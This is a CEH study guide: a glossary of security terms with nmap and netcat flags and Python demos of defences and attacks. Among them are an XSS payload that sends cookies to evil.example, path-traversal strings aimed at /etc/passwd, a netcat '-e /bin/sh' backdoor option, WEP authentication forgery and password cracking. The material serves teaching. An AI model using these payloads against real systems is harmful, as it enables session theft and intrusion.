CEH Study Guide
-----------------------------

Phases of Ethical Hacking
1. Reconnaissance / Footprinting
2. Scanning
3. Gaining Access
4. Maintaining Access
5. Covering Tracks
Ethical Hacker
A person who, with the owner's authorization, attacks a computer system or network in order to test or evaluate its security rather than for malicious or criminal purposes, and who uses those skills for defensive purposes only.
18 US Code 1029
Fraud and related activity in connection with access devices.
18 US Code 1030
Fraud and related activity in connection with computers.
Botnet
A botnet is a number of Internet-connected computers communicating with other similar machines in an effort to complete repetitive tasks and objectives. This can be as mundane as keeping control of an Internet Relay Chat (IRC) channel, or it could be used to send spam email or participate in distributed denial-of-service attacks.
OS Fingerprinting
Determining the type of operating system used by studying the types of packets flowing from a system. Passive OS fingerprinting only analyzes the packets. Active OS fingerprinting sends challenges to the OS and examines the type of responses.
SPAN Port
A switch feature (Switched Port Analyzer, also called port mirroring) that copies traffic from any or all data ports to a single monitoring port. The monitoring port normally does not accept inbound frames, so the sniffer attached to it cannot inject traffic back into the network.
Covert Channel
In computer security, a covert channel is a communication path that transfers information between processes that the security policy does not allow to communicate. It uses a protocol or shared resource in a way it was not designed to be used, for example by hiding data in the payload of ICMP echo packets.
Cryptography
Cryptography is a method of storing and transmitting data in a particular form so that only those for whom it is intended can read and process it. It will protect data in both storage and in transit.
Block Cipher
Is a deterministic algorithm operating on fixed-length groups of bits, called blocks, with an unvarying transformation that is specified by a symmetric key.
Circuit-level gateway firewall
Is a type of firewall. Circuit level gateways work at the session layer of the OSI model, or as a "shim-layer" between the application layer and the transport layer of the TCP/IP stack. They monitor TCP handshaking between packets to determine whether a requested session is legitimate.
System Integrity Verifier (SIV)
A host-based tool that records a baseline of critical system files (hashes, sizes, permissions) and periodically compares the current state against it, raising an alert when a file changes. Tripwire is the classic example. It is used to detect the file replacements a rootkit or intruder leaves behind.
Zone Transfer
When you edit the host information on one of your DNS servers (the master or primary), the change has to be copied to the other DNS servers (the slaves or secondaries). A zone transfer is the process by which the contents of a DNS zone file are copied from a primary DNS server to a secondary DNS server. It happens over TCP port 53 (query type AXFR). A server that answers zone transfer requests from anyone hands an attacker its complete host list, so transfers should be restricted to the addresses of the secondaries.
Proxy Server
A proxy server is a dedicated computer or a software system running on a computer that acts as an intermediary between an endpoint device, such as a computer, and another server from which a user or client is requesting a service. Hackers use proxy servers to hide their tracks such as their IP addresses.
Dual-Homed
Dual-homed or dual-homing can refer either to an Ethernet device that has more than one network interface, for redundancy, or, in firewall technology, to one of the firewall architectures for implementing preventive security: a host with one interface on the untrusted network and one on the internal network that does not route packets between them, so all traffic has to pass through a proxy on the host. Proxies and IDS/IPS sensors are commonly deployed on dual-homed hardware.
Network Tap
A network tap is a hardware device which provides a way to access the data flowing across a computer network. In many cases, it is desirable for a third party to monitor the traffic between two points in the network. Sometimes it's used along with Wireshark to capture all the Network traffic.
Active Sniffing
When sniffing is performed on a switched network it is known as active sniffing, because the attacker has to inject traffic (ARP poisoning, MAC flooding or similar) to make the switch deliver other hosts' frames to the sniffing port.
Ping of Death
On the Internet, ping of death is a denial of service (DoS) attack caused by an attacker deliberately sending an IP packet larger than the 65,535 bytes allowed by the IP protocol. One of the features of TCP/IP is fragmentation, which allows a single IP packet to be broken into smaller fragments; the oversized packet is sent as fragments that, when reassembled, overflow the receiving host's buffer.
PCI DSS
The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary information security standard for organizations that handle branded credit cards from the major card schemes including Visa, MasterCard, American Express, Discover, and JCB.
PCI Requirement 11
Regularly test security systems and processes. Many organizations perform little or no regular testing of the adequacy of the security controls governing their network and Internet-facing web applications. Failure to periodically run internal and external network scans to identify weaknesses can prove costly when back doors are left open to hackers and malicious code. A vulnerability scanner such as Nessus is commonly used to satisfy this requirement. PCI DSS also requires penetration testing at least once a year and after any significant infrastructure or application upgrade or modification.
Nessus
Nessus is a remote security scanning tool which scans a computer and raises an alert if it discovers any vulnerabilities that malicious hackers could use to gain access to any computer you have connected to a network. It does this by running a large library of plugin checks (signatures) against a given computer, testing whether any of those attacks could be used to break into the computer or otherwise harm it.
Passive Sniffing
Hubs see all the traffic in that particular collision domain. Sniffing performed on a hub is known as passive sniffing.
Security Auditing
Is the final step in the implementation of your security defenses. First you undertake a risk analysis to discover your assets and your risks. Then you develop a security policy to define what you are going to defend and how you are going to defend it. The audit then verifies that the controls in place actually adhere to that policy.
Policy Document
Policies are the business rules and guidelines of a company that ensure consistency and compliance with the company's strategic direction. The Policies lay out the business rules under which a company, division, or department will operate.
Process Document
Processes are related activities that produce a specific service or product.
Procedure Document
Procedures define the specific instructions necessary to perform a task or part of a Process. Procedures can take the form of a work instruction, a desk top Procedure, a quick reference guide, or a more detailed Procedure.
Sheepdip
Is a dedicated computer which is used to test files on removable media for viruses before they are allowed to be used with other computers.
Honeypot
Is a trap set to detect, deflect, or, in some manner, counteract attempts at unauthorized use of information systems. Generally, a honeypot consists of a computer, data, or a network site that appears to be part of a network, but is actually isolated and monitored, and which seems to contain information or a resource of value to attackers.
Bastion Host
Is a special-purpose computer on a network specifically designed and configured to withstand attacks. The computer generally hosts a single application, for example a proxy server, and all other services are removed or limited to reduce the threat to the computer. It is hardened in this manner primarily because of its location and purpose: it sits either outside the firewall or in the DMZ and is reached from untrusted networks or computers.
3 different types of authentication
The three types of authentication are what you know (password), what you have (token) and what you are (Biometrics).
Null Session
Is an anonymous connection (blank username and password) to the freely accessible IPC$ share on Windows-based servers, which can be used to enumerate users, groups, shares and policies. To counter it, restrict anonymous access through the RestrictAnonymous / RestrictAnonymousSAM registry settings and filter TCP ports 139 and 445 at the network perimeter.
Canonicalization
Is a process for converting data that has more than one possible representation into a "standard", "normal", or simplest form.
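The point of canonicalization in security checks is that the check must run on the canonical form, not on the raw string. The following Python function is an added example (not part of the original study guide) that collapses percent-encoding, "." and ".." segments and duplicate slashes before comparing a user-supplied path against an allowed base directory; the base directory "/srv/www" and the sample inputs are constructed for illustration.

```python
import posixpath
from urllib.parse import unquote


def canonicalize(base_dir, user_path):
    """Return the canonical path for user_path under base_dir, or None if it escapes.

    Every check runs on the canonical form: percent-decoding, '.', '..' and
    duplicate slashes are all collapsed first, so the comparison sees one
    representation no matter how the caller spelt the path.
    """
    # "%2e%2e%2f" is just another spelling of "../"; decode once, as a web server would
    decoded = unquote(user_path)
    # An embedded NUL truncates C strings, so a later layer would see a different name
    if "\x00" in decoded:
        return None
    base = posixpath.normpath(base_dir)
    # Drop a leading slash so an absolute user path cannot replace the base directory
    candidate = posixpath.normpath(posixpath.join(base, decoded.lstrip("/")))
    # The trailing slash matters: "/srv/wwwroot" starts with "/srv/www" but is not inside it
    if candidate != base and not candidate.startswith(base + "/"):
        return None
    return candidate


# Constructed inputs: several spellings of the same two targets
SAMPLES = [
    "docs/readme.txt",           # plain
    "docs//./readme.txt",        # duplicate slash and current-dir segment
    "docs/../../etc/passwd",     # classic traversal
    "%2e%2e/%2e%2e/etc/passwd",  # percent-encoded traversal
    "readme.txt%00.jpg",         # NUL byte aimed at an extension check
    "../wwwroot/secret",         # sibling directory sharing the prefix
]


def check_all(base_dir="/srv/www"):
    """Map each sample to its canonical path, or None when it is rejected."""
    return {path: canonicalize(base_dir, path) for path in SAMPLES}


if __name__ == "__main__":
    for path, result in check_all().items():
        print(f"{path!r:30} -> {result}")
```

Decode exactly once and in the same way the front end does: a filter that decodes twice while the web server decodes once (or the reverse) is itself a canonicalization mismatch an attacker can exploit with doubly encoded input such as %252e.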
Buffer Overflow
In computer security and programming, a buffer overflow, or buffer overrun, is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory. It is a special case of a memory-safety violation. On the stack the adjacent memory includes the saved return address, so the value loaded into EIP (the 32-bit x86 instruction pointer; RIP on x86-64) when the function returns is what the attacker controls.
Cross-site scripting
Cross-site scripting (XSS) is a type of computer security vulnerability typically found in Web applications. XSS enables attackers to inject client-side script into Web pages viewed by other users. A cross-site scripting vulnerability may be used by attackers to bypass access controls such as the same-origin policy.
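As an added example (not code from the original study guide), the following Python snippet renders an untrusted value into a constructed page template in two ways, pasted in raw and HTML-encoded, and then uses the standard library's HTML parser to check what a browser would see. The template, the two payloads and the finder are all constructed for illustration; the point is that the same encoding fixes both the text-node and the attribute context, provided quotes are encoded as well.

```python
import html
from html.parser import HTMLParser

# Constructed page template: the user-controlled value lands in a text node and in an attribute
TEMPLATE = '<p>Hello, {name}!</p><input type="text" value="{name}">'


def render_unsafe(name):
    """Vulnerable: the untrusted value is pasted straight into the HTML."""
    return TEMPLATE.format(name=name)


def render_safe(name):
    """Hardened: encode for the HTML context before insertion.

    quote=True also encodes " and ', which is what keeps the attribute payload
    from closing the value="..." and adding attributes of its own.
    """
    return TEMPLATE.format(name=html.escape(name, quote=True))


class ScriptFinder(HTMLParser):
    """Parse the rendered page the way a browser would and record anything that executes."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.findings.append("script tag")
        for attr_name, _ in attrs:
            if attr_name.startswith("on"):          # onfocus, onerror, onload, ...
                self.findings.append(f"{tag} {attr_name} handler")


def script_findings(page):
    finder = ScriptFinder()
    finder.feed(page)
    return finder.findings


# Constructed attacker inputs, one per context
TEXT_PAYLOAD = "<script>document.location='http://evil.example/?c='+document.cookie</script>"
ATTR_PAYLOAD = '" autofocus onfocus="alert(document.domain)'

if __name__ == "__main__":
    for payload in (TEXT_PAYLOAD, ATTR_PAYLOAD):
        print("unsafe:", script_findings(render_unsafe(payload)))
        print("safe:  ", script_findings(render_safe(payload)))
```

The finder is only a demonstration oracle; real defence is the encoding in render_safe plus a Content-Security-Policy, not output scanning.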
Session Hijacking
Is the exploitation of a valid computer session, sometimes also called a session key, to gain unauthorized access to information or services in a computer system. In particular, it refers to the theft of the cookie used to authenticate a user to a remote server. Countermeasures include unpredictable session identifiers and randomized TCP initial sequence numbers, encrypting the session with TLS, regenerating the session ID after login, and marking cookies Secure and HttpOnly.
Canary
Canaries or canary words are known values placed between a buffer and control data on the stack to detect buffer overflows. When the buffer overflows, the first data to be corrupted is usually the canary, so a failed verification of the canary before the function returns is an alert of an overflow. Microsoft's Visual C++ /GS option and GCC's -fstack-protector implement this defence.
Session Cookie
Also called a transient cookie, a cookie that is erased when the user closes the Web browser.
Persistent / Permanent Cookies
These remain on your hard drive until you erase them or they expire. How long a cookie remains on your browser depends on how long the visited website has programmed the cookie to last.
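The session-versus-persistent distinction above, and the session hijacking entry before it, both come down to the attributes on the Set-Cookie header. The following Python is an added example (not from the original guide) that parses Set-Cookie headers with the standard library, classifies each cookie by lifetime and flags the attributes whose absence makes the cookie easier to steal. The three headers are constructed samples; the cookie names and values mean nothing.

```python
from http.cookies import SimpleCookie

# Constructed Set-Cookie headers as a server might send them
SAMPLE_HEADERS = [
    "sid=9f3a1c2e; Path=/; HttpOnly; Secure; SameSite=Lax",
    "prefs=dark; Path=/; Max-Age=2592000",
    "remember_me=9f3a1c2e; Expires=Wed, 21 Oct 2026 07:28:00 GMT; Path=/",
]


def audit_set_cookie(header):
    """Classify one Set-Cookie header as session or persistent and report the
    attributes that matter for hijacking resistance."""
    jar = SimpleCookie()
    jar.load(header)
    report = []
    for name, morsel in jar.items():
        # A cookie without Expires or Max-Age lives only until the browser closes
        persistent = bool(morsel["expires"]) or bool(morsel["max-age"])
        issues = []
        if not morsel["secure"]:
            issues.append("missing Secure: also sent over plain HTTP, so it can be sniffed")
        if not morsel["httponly"]:
            issues.append("missing HttpOnly: readable by injected script (XSS)")
        if not morsel["samesite"]:
            issues.append("missing SameSite: attached to cross-site requests")
        report.append({
            "name": name,
            "kind": "persistent" if persistent else "session",
            "lifetime": morsel["expires"] or morsel["max-age"] or "until browser closes",
            "issues": issues,
        })
    return report


def audit_all(headers=SAMPLE_HEADERS):
    return [entry for header in headers for entry in audit_set_cookie(header)]


if __name__ == "__main__":
    for entry in audit_all():
        print(f"{entry['name']}: {entry['kind']} ({entry['lifetime']})")
        for issue in entry["issues"]:
            print("   -", issue)
```

An authentication cookie should normally be a session cookie carrying all three attributes, as the first sample does; a persistent "remember me" token without Secure or HttpOnly is exactly the magic cookie the session hijacking entry describes.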
Loki
Loki is a covert-channel tool (described in Phrack 49) that tunnels a command shell inside the payload of ICMP echo request and reply packets. Because most firewalls and IDS treat ping traffic as benign, the channel passes unnoticed; detection relies on spotting ICMP echo traffic with unusual payloads, sizes or volumes, or on blocking ICMP echo altogether. It should not be confused with LOKI89 and LOKI91, which are unrelated symmetric-key block ciphers designed as possible replacements for the Data Encryption Standard (DES).
Firewalking
Firewalking is a technique for discovering which ports and protocols a firewall lets through; it is not a way of disguising port scans. It works like traceroute: the attacker sends TCP or UDP packets whose TTL is one hop greater than the hop count to the targeted firewall. If the firewall passes the packet, it is forwarded to the next hop, where the TTL is decremented to zero and an ICMP "time exceeded in transit" message (type 11) is returned; if the firewall blocks it, nothing comes back. Sending successive probe packets to different ports in this way maps the rules configured on the gateway.
Brute Force Attack
A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN). In a brute force attack, the software tries every possible combination of characters until it finds the correct one. It takes the longest but, given enough time, it is guaranteed to find the password.
Hybrid Attack
A hybrid attack combines the other two: it takes each dictionary word and applies brute-force style mutations to it, such as appending digits, substituting characters or changing case, so that "summer42" is found without trying every possible eight-character string.
Dictionary Attack
A dictionary attack is a method of breaking into a password-protected computer or server by systematically entering every word in a dictionary as a password. A dictionary attack can also be used in an attempt to find the key necessary to decrypt an encrypted message or document.
Phishing Attack
Phishing is the illegal attempt to acquire sensitive information such as usernames, passwords, and credit card details (and sometimes, indirectly, money), often for malicious reasons, by masquerading as a trustworthy entity in an electronic communication or via a fake website.
Rainbow Tables
A rainbow table is a precomputed table for reversing cryptographic hash functions, usually for cracking password hashes. Tables are usually used in recovering a plaintext password up to a certain length consisting of a limited set of characters.
Password Salting
In cryptography, a salt is random data that is used as an additional input to a one-way function that hashes a password or passphrase. The primary function of salts is to defend against dictionary attacks versus a list of password hashes and against pre-computed rainbow table attacks.
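The four password attacks above and the salt that defeats the precomputed one are easiest to see side by side. The following Python is an added example (not part of the original guide) that runs a dictionary attack, a hybrid attack and a brute-force search against SHA-256 hashes, builds a precomputed hash-to-plaintext table, and then shows that a random salt makes the table useless. The wordlist, the target password "summer42" and the use of SHA-256 are all constructed for illustration; the table is a plain lookup table rather than a chain-based rainbow table, which shares the property that matters here.

```python
import hashlib
import itertools
import os
import string

# Constructed wordlist; a real one has millions of entries
WORDLIST = ["password", "letmein", "summer", "dragon", "qwerty"]
ALPHABET = string.ascii_lowercase + string.digits


def unsalted_hash(password):
    return hashlib.sha256(password.encode()).hexdigest()


def salted_hash(password, salt):
    """The salt is stored beside the hash; it is not secret, it just makes every hash unique."""
    return hashlib.sha256(salt + password.encode()).hexdigest()


def dictionary_attack(target, words):
    """Try each word exactly as listed."""
    for word in words:
        if unsalted_hash(word) == target:
            return word
    return None


def hybrid_candidates(words, suffix_len=2):
    """Each word on its own, then with every digit suffix: summer, summer00 .. summer99."""
    for word in words:
        yield word
        for digits in itertools.product(string.digits, repeat=suffix_len):
            yield word + "".join(digits)


def hybrid_attack(target, words, suffix_len=2):
    for candidate in hybrid_candidates(words, suffix_len):
        if unsalted_hash(candidate) == target:
            return candidate
    return None


def brute_force(target, alphabet, max_len):
    """Every string up to max_len: guaranteed to succeed, exponential in length."""
    for length in range(1, max_len + 1):
        for chars in itertools.product(alphabet, repeat=length):
            candidate = "".join(chars)
            if unsalted_hash(candidate) == target:
                return candidate
    return None


def build_lookup_table(words, suffix_len=2):
    """Hash every candidate once; afterwards any number of hashes is cracked by lookup.
    This only works because the hash has no per-user input."""
    return {unsalted_hash(c): c for c in hybrid_candidates(words, suffix_len)}


def run_demo(target_plain="summer42"):
    table = build_lookup_table(WORDLIST)
    unsalted = unsalted_hash(target_plain)
    salt = os.urandom(16)                       # per-user random salt
    salted = salted_hash(target_plain, salt)
    return {
        "dictionary": dictionary_attack(unsalted, WORDLIST),  # None: not a bare word
        "hybrid": hybrid_attack(unsalted, WORDLIST),          # found: word + digits
        "table_unsalted": table.get(unsalted),                # found instantly
        "table_salted": table.get(salted),                    # None: salt changed the hash
        "table_size": len(table),
    }


if __name__ == "__main__":
    print(run_demo())
```

A salt only removes the precomputation shortcut; each salted hash can still be attacked on its own, which is why password storage pairs the salt with a deliberately slow function (PBKDF2, bcrypt, scrypt or Argon2) rather than a single fast SHA-256.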
Chosen plaintext attack
A chosen-plaintext attack (CPA) is an attack model for cryptanalysis which presumes that the attacker can obtain the ciphertexts for arbitrary plaintexts. The goal of the attack is to gain information which reduces the security of the encryption scheme.
Stream Cipher
Is a symmetric key cipher where plaintext digits are combined with a pseudorandom cipher digit stream (keystream). In a stream cipher each plaintext digit is encrypted one at a time with the corresponding digit of the keystream, to give a digit of the cipher text stream.
Hunt Software
Hunt is a program for intruding into a connection, watching it and resetting it. It's commonly used for the man in the middle attack as a form of intercepting traffic.
USB Dumper
USB Dumper is a simple yet very reliable software solution designed to provide you with the ability to automatically and silently copy data from a flash drive that is connected to your PC, without prompting you for any confirmation.
Man-in-the-middle Attack
In cryptography and computer security, a man-in-the-middle attack (often abbreviated to MITM, MitM, MIM, MiM or MITMA) is an attack where the attacker secretly relays and possibly alters the communication between two parties who believe they are directly communicating with each other.
SSL
Stands for Secure Sockets Layer, the predecessor of TLS. It provides an encrypted connection between internet browsers and websites, allowing you to transmit private data online. Sites secured with SSL/TLS display a padlock in the browser's address bar (older browsers also showed a green bar for sites with an EV certificate). Attackers can also use it to evade a network IDS, which cannot inspect the contents of encrypted traffic unless the organization deliberately decrypts it (TLS interception).
Kerberos
Is a computer network authentication protocol which works on the basis of 'tickets' to allow nodes communicating over a non-secure network to prove their identity to one another in a secure manner. Its designers aimed it primarily at a client-server model and it provides mutual authentication: both the user and the server verify each other's identity. Kerberos protocol messages are protected against eavesdropping and replay attacks. The Key Distribution Center listens on TCP and UDP port 88.
XML Denial of Service Attack
An XML denial-of-service attack is a content-borne denial-of-service attack whose purpose is to shut down a web service or system running that service. It's also a vulnerability for the SOA (Service Oriented Architecture).
Throttling
The process of limiting resource usage to keep a particular process from bogging down and/or crashing a system. Relevant as a countermeasure in DoS attacks, where an attacker attempts to crash the system by overloading it with input. It adjusts all incoming traffic so that the local servers can properly process the traffic.
IP Fragment Scanning
Is a scanning technique that splits the TCP header of a probe across several small IP fragments, so that a packet filter which inspects only the first fragment, or does not reassemble fragments at all, cannot see the full header and lets the probe through. nmap's -f option does this.
Asymmetric Encryption
Asymmetric encryption uses two mathematically related keys, a key pair. A public key is made freely available to anyone who might want to send you a message. A second, private key is kept secret, so that only you know it. Whatever is encrypted with one key of the pair can only be decrypted with the other.
Shared Key Authentication
The client sends an authentication request to the access point (AP). The AP replies with a clear text challenge (128 bytes). The client encrypts the challenge text using the configured WEP key and sends it back in another authentication request. The AP decrypts the response and, if it matches the challenge text, sends back a positive response. Because the challenge and its encrypted form both travel in the clear, an eavesdropper can XOR them to recover the RC4 keystream and then authenticate without knowing the key.
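The stream cipher entry and the shared key authentication entry above describe the same weakness from two sides: a keystream XORed with known plaintext gives the keystream back, and reusing it lets anyone encrypt. The following Python is an added example (not from the original guide) that implements RC4, wraps it the way WEP does (24-bit IV prepended to the key, CRC-32 integrity value), runs one legitimate shared-key authentication, and then has an eavesdropper authenticate with a fresh challenge without ever learning the key. The 40-bit WEP key and the 128-byte challenge length are constructed for the demonstration.

```python
import os
import struct
import zlib


def rc4(key, data):
    """RC4: key-scheduling algorithm, then XOR data with the generated keystream."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def icv(body):
    """WEP integrity check value: CRC-32 of the plaintext, little-endian."""
    return struct.pack("<I", zlib.crc32(body) & 0xFFFFFFFF)


def wep_encrypt(wep_key, iv, body):
    # The per-packet RC4 key is the 24-bit IV followed by the shared key
    return rc4(iv + wep_key, body + icv(body))


def wep_decrypt(wep_key, iv, ciphertext):
    plain = rc4(iv + wep_key, ciphertext)
    body, tag = plain[:-4], plain[-4:]
    return body if icv(body) == tag else None


# Constructed 40-bit key known to the AP and the legitimate client only
WEP_KEY = bytes.fromhex("0f1e2d3c4b")
CHALLENGE_LEN = 128


def ap_new_challenge():
    return os.urandom(CHALLENGE_LEN)


def client_answer(wep_key, challenge):
    iv = os.urandom(3)
    return iv, wep_encrypt(wep_key, iv, challenge)


def ap_verify(wep_key, challenge, iv, response):
    return wep_decrypt(wep_key, iv, response) == challenge


# --- eavesdropper, who sees challenge, IV and response in the clear ---
def recover_keystream(challenge, response):
    """(challenge || ICV) XOR ciphertext = the RC4 keystream for this IV."""
    plain = challenge + icv(challenge)
    return bytes(p ^ c for p, c in zip(plain, response))


def forge_answer(keystream, iv, challenge):
    """Reuse the captured IV and keystream to encrypt a new challenge without the key."""
    plain = challenge + icv(challenge)
    return iv, bytes(p ^ k for p, k in zip(plain, keystream))


def run_attack():
    # 1. legitimate client authenticates; the attacker records c1, iv and r1
    c1 = ap_new_challenge()
    iv, r1 = client_answer(WEP_KEY, c1)
    legit_ok = ap_verify(WEP_KEY, c1, iv, r1)
    keystream = recover_keystream(c1, r1)
    # 2. attacker authenticates against a fresh challenge using the same IV
    c2 = ap_new_challenge()
    forged_iv, r2 = forge_answer(keystream, iv, c2)
    forged_ok = ap_verify(WEP_KEY, c2, forged_iv, r2)
    return legit_ok, forged_ok, len(keystream)


if __name__ == "__main__":
    print("legitimate auth:", run_attack()[0], "forged auth:", run_attack()[1])
```

The AP accepts the forgery because it has no way to tell that this IV was used before; WEP's 24-bit IV space guarantees repeats anyway. A stream cipher is only safe when every key/IV pair is used once and the integrity check is a keyed MAC rather than a CRC.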
Key Escrow
Is an arrangement in which the keys needed to decrypt encrypted data are held in escrow so that, under certain circumstances, an authorized third party may gain access to those keys.
CSIRT (Computer Security Incident Response Team)
Computer Security Incident Response Team is an organization that receives reports of security breaches, analyses them and responds to the senders. It acts as the single point of contact for reporting computer security incidents within its constituency (for example, US-CERT for the United States).
ICMP Pings
A ping sweep (also known as an ICMP sweep) is a basic network scanning technique used to determine which of a range of IP addresses map to live hosts. Whereas a single ping tells you whether one specified host exists on the network, a ping sweep consists of ICMP (Internet Control Message Protocol) ECHO requests sent to multiple hosts. If a given address is live, it returns an ICMP ECHO reply. Many firewalls drop ICMP echo, so the absence of a reply does not prove that a host is down; nmap falls back to TCP and ARP probes for that reason.
IPSec
Is a protocol suite for securing Internet Protocol (IP) communication by authenticating and encrypting each IP packet of a communication session. IPsec includes protocols for establishing mutual authentication between agents at the beginning of the session and negotiation of cryptographic keys to be used during the session. It can be used to protect data flows between two hosts.
WinPCap
WinPcap is a port of the UNIX libpcap (packet capture) library, which in turn is built on BPF (Berkeley Packet Filter). WinPcap consists of wpcap.dll, which implements the high-level functions, packet.dll, a low-level user-mode library, and npf.sys, the kernel-mode driver that actually captures the packets. Its maintained successor on current Windows versions is Npcap.
Toneloc Tool
ToneLoc is a war dialing tool: it dials ranges of telephone numbers and records which ones answer with a modem or other device.
Common ICMP Message Types:
0: Echo Reply (ping command)
3: Destination Unreachable
3 Code 13: Administratively prohibited
5: Redirect
8: Echo Request (ping command)
11: Time Exceeded
13: Timestamp
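To make the ICMP types above and the ping sweep entry concrete, the following Python is an added example (not part of the original guide) that builds ICMP messages with a correct RFC 1071 checksum, parses them back, and classifies what a sweep learns from each reply, including the "administratively prohibited" case that means a filter rather than a dead host. No packets are sent; every message is constructed in memory, so it runs without raw-socket privileges.

```python
import struct

ICMP_TYPES = {0: "Echo Reply", 3: "Destination Unreachable", 5: "Redirect",
              8: "Echo Request", 11: "Time Exceeded", 13: "Timestamp"}
UNREACHABLE_CODES = {0: "net unreachable", 1: "host unreachable", 3: "port unreachable",
                     13: "communication administratively prohibited"}


def icmp_checksum(data):
    """RFC 1071 one's-complement sum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"                      # pad odd-length data for the last word
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp(icmp_type, code, rest_of_header, payload=b""):
    """Assemble type, code, checksum, 4 type-specific bytes and payload."""
    header = struct.pack("!BBH", icmp_type, code, 0) + rest_of_header
    checksum = icmp_checksum(header + payload)
    return struct.pack("!BBH", icmp_type, code, checksum) + rest_of_header + payload


def build_echo_request(identifier, sequence, payload):
    return build_icmp(8, 0, struct.pack("!HH", identifier, sequence), payload)


def parse_icmp(packet):
    if len(packet) < 8:
        raise ValueError("ICMP message shorter than 8 bytes")
    icmp_type, code, _ = struct.unpack("!BBH", packet[:4])
    result = {
        "type": icmp_type,
        "code": code,
        "name": ICMP_TYPES.get(icmp_type, "unknown"),
        # summing a valid message including its checksum field gives all ones,
        # so the complement is zero
        "checksum_ok": icmp_checksum(packet) == 0,
    }
    if icmp_type in (0, 8):
        result["id"], result["seq"] = struct.unpack("!HH", packet[4:8])
        result["payload"] = packet[8:]
    elif icmp_type == 3:
        result["reason"] = UNREACHABLE_CODES.get(code, "code %d" % code)
    return result


def interpret_sweep_reply(packet):
    """What a ping sweep can conclude from one reply."""
    msg = parse_icmp(packet)
    if not msg["checksum_ok"]:
        return "corrupt"
    if msg["type"] == 0:
        return "alive"
    if msg["type"] == 3 and msg["code"] == 13:
        return "filtered (admin prohibited)"      # a device is blocking, host state unknown
    if msg["type"] == 3:
        return "unreachable: " + msg["reason"]
    return msg["name"]


if __name__ == "__main__":
    req = build_echo_request(0x1234, 1, b"abc")
    print(req.hex(), parse_icmp(req))
```

Silence is the one outcome the classifier cannot represent: a host that is up behind a silently dropping firewall produces no reply at all, which is why a sweep should fall back to TCP probes before declaring an address dead.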
nmap -sS
SYN stealth (half-open) scan: sends a SYN and reads the SYN-ACK or RST without completing the handshake. Needs raw-socket privileges.
nmap -sO
IP protocol scan: determines which IP protocols (ICMP, TCP, UDP, ...) the host supports. It does not list open ports.
nmap -sA
ACK scan, used to map out firewall rulesets.
nmap -O
Operating system detection.
nmap -sP
Ping scan: lists the IP addresses active on the network (current versions use -sn for this).
nmap -p
Port or ports to scan.
nmap -sV
Version scanning of the services found.
nmap -A
Aggressive scan: OS detection, version detection, default scripts and traceroute in one run.
nmap -F
Fast scan: only the 100 most common ports instead of the default 1000.
nmap -PO
IP protocol ping: host discovery using packets of different IP protocols.
nmap -T0 to -T5
Timing templates; the slow ones (-T0 paranoid, -T1 sneaky) spread probes out to avoid detection by an IDS.
nc -e program
Program to execute once a connection is made; -e /bin/sh (or cmd.exe) turns netcat into a backdoor or reverse shell.
nc -l
Listen mode for inbound connections.
nc -L
Listen harder: re-listen after the socket closes (Windows build only).
nc -o file
Hex dump of the traffic to file.
nc -p port
Local source port number.
nc -t
Answer TELNET negotiation.
nc -u
UDP mode.
nc -v
Verbose mode (use twice to be more verbose).
nc -w seconds
Timeout for connects and final net reads.
Diffie-Hellman Groups
They determine the strength of the key used in the exchange process.
DH Group 1
768-bit
DH Group 2
1024-bit
DH Group 5
1536-bit
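Why the group size sets the strength of the exchange is clearest on a group small enough to attack by hand. The following Python is an added example (not from the original guide) that runs a Diffie-Hellman exchange for both parties and then lets an eavesdropper recover the shared secret by brute-forcing the discrete logarithm. The modulus p = 23 and generator g = 5 are a constructed toy group; the same loop against the 768-, 1024- and 1536-bit primes of groups 1, 2 and 5 would never finish, which is the whole point of those sizes.

```python
def dh_public(p, g, private):
    """Public value g^private mod p, sent in the clear."""
    return pow(g, private, p)


def dh_shared(p, peer_public, private):
    """Shared secret peer_public^private mod p; both sides reach the same number."""
    return pow(peer_public, private, p)


def crack_private(p, g, public, limit=None):
    """Brute-force the discrete log: the x with g^x mod p == public.

    Feasible only because the toy group is tiny; for real groups the search space
    is on the order of p, i.e. hundreds of bits.
    """
    limit = p if limit is None else limit
    value = 1                                    # g^0
    for x in range(limit):
        if value == public:
            return x
        value = (value * g) % p
    return None


# Constructed toy group; real IKE groups use primes of 768 bits and up
P, G = 23, 5


def run_exchange(a=6, b=15):
    """Alice holds a, Bob holds b; Eve sees only P, G, A and B."""
    A = dh_public(P, G, a)
    B = dh_public(P, G, b)
    alice_secret = dh_shared(P, B, a)
    bob_secret = dh_shared(P, A, b)
    recovered_a = crack_private(P, G, A)         # Eve's attack on the small group
    eve_secret = None if recovered_a is None else dh_shared(P, B, recovered_a)
    return {"A": A, "B": B, "alice": alice_secret, "bob": bob_secret,
            "recovered_a": recovered_a, "eve": eve_secret}


if __name__ == "__main__":
    print(run_exchange())
```

Group choice is negotiated in IKE phase 1, which is exactly what ike-scan enumerates; a VPN that still accepts group 1 lets an attacker drive the exchange down to the weakest modulus.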
3DES encryption
In cryptography, Triple DES (3DES) is the common name for the Triple Data Encryption Algorithm (TDEA or Triple DEA) symmetric-key block cipher, which applies the Data Encryption Standard (DES) cipher algorithm three times to each data block.
GET and POST commands
HTML forms submit their results using one of two methods, GET or POST. With GET, all form parameters and their values appear in the query string of the next URL, where the user sees them and where they end up in browser history, proxy and server logs and Referer headers. POST keeps them in the request body, so prefer POST for sensitive data. POST is not a security control, though: an attacker can tamper with a POST body just as easily as with a query string, so every parameter must still be validated on the server.
SYSKEY
Is a utility that encrypts the hashed password information in the SAM database of a Windows system using a 128-bit RC4 key. Depending on the mode chosen, booting a computer protected this way requires either a password typed at startup or a key stored on external media (floppy disk, USB flash drive), otherwise the key is derived from the registry and stored on the machine.
